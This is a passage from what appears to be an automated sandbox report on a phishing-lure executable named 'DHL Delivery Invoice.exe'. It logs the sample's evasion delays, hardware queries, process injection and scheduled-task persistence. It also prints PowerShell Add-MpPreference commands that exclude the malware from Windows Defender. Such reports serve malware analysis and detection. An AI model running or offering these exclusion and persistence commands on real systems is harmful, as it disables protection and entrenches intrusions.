                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -94718s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340, Thread sleep time: -94609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7308, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99516s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99157s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -99032s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98907s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -98079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -97079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -96079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -95079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94704s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94579s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94454s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94204s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -94079s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe TID: 7556, Thread sleep time: -93954s >= -30000s
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99672Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99561Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99343Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99234Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99125Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98906Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98796Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98685Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98359Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 98019Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97905Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97468Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97357Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97249Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96921Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96812Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96593Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96484Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96375Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96265Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96156Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 96047Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95936Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95828Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95718Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95597Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95484Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95375Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95265Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95156Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 95047Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94936Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94828Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94718Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 94609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99625
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99516
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99391
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99266
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99157
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 99032
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98907
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98797
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98688
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98563
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98438
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98313
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98188
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 98079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 97079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 96079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 95079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94954
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94829
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94704
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94579
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94454
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94329
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94204
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 94079
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 93954
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4257955179.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4257158218.000000000134B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory written: C:\Users\user\Desktop\DHL Delivery Invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory written: C:\Users\user\AppData\Roaming\LIWBHGsz.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Invoice.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
